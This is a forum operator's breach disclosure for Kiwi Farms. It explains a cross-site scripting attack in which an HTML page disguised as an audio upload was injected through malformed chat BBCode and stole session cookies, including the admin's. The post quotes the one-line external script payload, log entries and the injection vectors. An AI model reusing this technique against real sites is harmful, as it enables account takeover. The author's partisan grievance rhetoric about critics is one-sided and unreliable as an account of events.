Kiwi Farms

Site Breach
User Impact Statement
The forum was hacked. You should assume the following.

Assume your password for the Kiwi Farms has been stolen.
Assume your email has been leaked.
Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.
You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.

Prognosis
The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation
Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.
The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.
The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
You can find relevant scripts below.
https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
https://github.com/jaw-sh/ruforo/tree/master/src/bbcode
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
<jcmoon@pm.me>

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.

Update Sep-19: XSS Injection Found
There were two possible ways to inject an inframe into the chat html, one by using [code] tags, and another by malforming an opening tag, like [b<tag>].

Thank you to the three anonymous people who submitted this information.

In my life, there is a family emergency. It has absolutely nothing to do with the forum drama. I cannot and will not elaborate further. There will be a week or more where I am completely unavailable and it is likely the site will go down during this time where I will not be able to bring it up.

I want to appraise our situation frankly.

Domain Registrar
Cloudflare was both our application-level DDoS mitigation and our domain registrar. They have given me a way to transfer my domains to another registrar. I do not know what registrar to send it to because I do not have faith in any company.

DDoS Mitigation
DDoS-Guard will drop us dropped us while I was writing this post. This meme about Russia being a free country is a joke. The US is a free country, but with no stewards to protect it. Without the US, there is no second best. I did not expect Cloudflare to crumple so quickly and I don't have a Plan C for DDoS mitigation.

Resource Allocation
I own IP addresses. Our IP allocation is from APNIC. APNIC is one of the 5 private companies which allocate Internet resources around the world. APNIC happens to be based out of Australia, which recently passed draconian censorship laws. There is an effort to get our RIR to revoke our allocation. This would be unprecedented in the history of the Internet, and considering China is in APNIC's region, an absolutely horrific standard which will echo throughout the upcoming decades. There is a non-zero chance of this happening.

Hosting
We have one host and I am looking at two more. It is likely that the host will give up too. The two hosts confident they can handle the Kiwi Farms are probably wrong. DDoS-Guard was confident they could handle the Kiwi Farms and said "bring it on" for less than 24 hours.


This is an organized attack. There is a coalition of criminals trying to frame the forum for their behavior. These criminals provide opportunities for professional victims to amplify their message. Journalists canonize the crimes as the behavior of the forum itself, which becomes the effective truth for the general public.

This is a machine that was built up formerly against 8chan and activates any time the cathedral wants to test the new fronts of its censorship. It is a massive amalgamation of various interests. I am one person. The financial limitations aren't even the real problem - the problem is, I am powerless alone. There is no amount of money I can throw to convince people to be brave and be free. This is just the reality of our country.

And what this machine will not accept is compromise. If I censored specific kinds of behavior, it would not matter. They don't want a specific thing censored. They want the average person to be able to speak in channels where only specific thoughts are acceptable.

More importantly, they want to make it so that no small organization can host a service which threatens the cathedral. It used to be that one guy with a good idea could open a platform and be a Tom Anderson, Mark Zuckerberg, Tom Fulp, Christopher Poole, or Richard Kyanka. Take note these names are all from 10+ years ago. There are no new groundbreakers online anymore because breaking ground in the new Internet's corporate parking lot is not allowed.


I do not see a situation where the Kiwi Farms is simply allowed to operate. It will either become a fractured shell of itself, like 8chan, or jump between hosts and domain names like Daily Stormer.

http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/threads/the-endless-drum-beating.129023/

Accessible via <https://www.torproject.org/download/> OR
Press ALT+SHIFT+N on Brave <https://brave.com/download/>

www.torproject.org (https://www.torproject.org/download/)